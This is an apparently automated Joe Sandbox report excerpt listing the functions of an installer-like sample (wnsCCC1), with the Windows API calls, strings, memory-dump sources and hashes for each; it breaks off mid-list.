                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 771 405f0d-405f19 772 405f1a-405f4e GetTickCount GetTempFileNameW 771->772 773 405f50-405f52 772->773 774 405f5d-405f5f 772->774 773->772 775 405f54 773->775 776 405f57-405f5a 774->776 775->776
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,004C1000,004034A3,004D1000,004D5000,004D5000,004D5000,004D5000,004D5000,74DF3420,004036EF), ref: 00405F46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E730,Error launching installer), ref: 004059FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                                              • Opcode ID: 8941ac05e4937e204e88b6b93cbbbbf1e6cab01e5c2f1d465c17e9c6e72d0440
                                                                                                                                                                                                              • Instruction ID: 7eb9064dadea35cbfc58acd36067de01cdd5d52a4e03f37d51203587584f4729
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8941ac05e4937e204e88b6b93cbbbbf1e6cab01e5c2f1d465c17e9c6e72d0440
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86E012B0610209BFEB00AFA0ED49F7B7AACFB08204F008921BD00F2191D774A9148A68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00401BE7
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401BF9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                              • String ID: InetHelper
                                                                                                                                                                                                              • API String ID: 3394109436-2767297512
                                                                                                                                                                                                              • Opcode ID: 176a51b4a66ca6db00c120fdfff2a52918b74a80b70c450353fe484a1e272d38
                                                                                                                                                                                                              • Instruction ID: 2224cfe726421d4168c30344d3cbfba70e659b3895da8488867bc6a87a7a29a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 176a51b4a66ca6db00c120fdfff2a52918b74a80b70c450353fe484a1e272d38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5321EB72A00200ABDB10EF95CEC49DE73A4AB543187A4403BF506F32D1DB78E891CB6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405AB2 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405EB9: GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                                • Part of subcall function 00405EB9: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405ED2
                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405C94), ref: 00405ACD
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000000,00405C94), ref: 00405AD5
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405AED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1655745494-0
                                                                                                                                                                                                              • Opcode ID: ee26814d0e89ccba1e58ecbc8b5a308cd0754c8ce938ef3c5221310ac7d33209
                                                                                                                                                                                                              • Instruction ID: 2750ea62591d09886f88fd119c0b0bc2019991ac89723f17ff6745a253c15028
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee26814d0e89ccba1e58ecbc8b5a308cd0754c8ce938ef3c5221310ac7d33209
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE0E531305A9056C7106B759A48B5B3AD8EF8E324F060B3BF592F11C0CBB845068FBD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406873 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406899
                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE(?,?), ref: 004068A6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2567322000-0
                                                                                                                                                                                                              • Opcode ID: 058b86cb8c5b11f12917a2041960eef3384f514dab9b8efc3c465a5e278299d9
                                                                                                                                                                                                              • Instruction ID: 54c41dae5f15cf301fa098fb72fed04142b8325bbdcb3ac6ef2f4a5ab910b3b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 058b86cb8c5b11f12917a2041960eef3384f514dab9b8efc3c465a5e278299d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55E09232600118BBDB00AF44DD02E9E7B6ADB44754F158037BA05B61A1D6B19E21EAA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401E7D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405A14: ShellExecuteExW.SHELL32(?), ref: 00405A23
                                                                                                                                                                                                                • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                                • Part of subcall function 00406873: GetExitCodeProcess.KERNELBASE(?,?), ref: 004068A6
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
